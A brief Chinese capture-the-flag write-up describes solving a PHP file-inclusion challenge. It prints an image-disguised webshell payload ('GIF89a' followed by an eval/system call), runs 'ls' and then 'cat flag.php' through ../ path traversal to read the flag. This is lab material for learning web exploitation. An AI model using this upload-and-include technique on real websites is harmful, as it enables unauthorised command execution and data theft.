What can images do
题目入口http://101.201.126.95:7004
最意想不到的图,做出最超乎想象的事...
做了很久,在队员的指引下,做出来了,感谢
进入正题,先提交下下面的图片,url出现filename=file1.php&submit=提交, 应该能看出来是道文件包含的题目,
然后上传文件,上传一句话木马,上传失败
上传图片马,上传成功,但是菜刀怎样连接都无法连上,怀疑环境被整了
经过同学的点拨,上传图片马进行查看
GIF89a <?php @eval("system('ls');")?>
查看目录
将ls改为cat flag.php,再次上传, ../不能省略
F12查看,flag到手~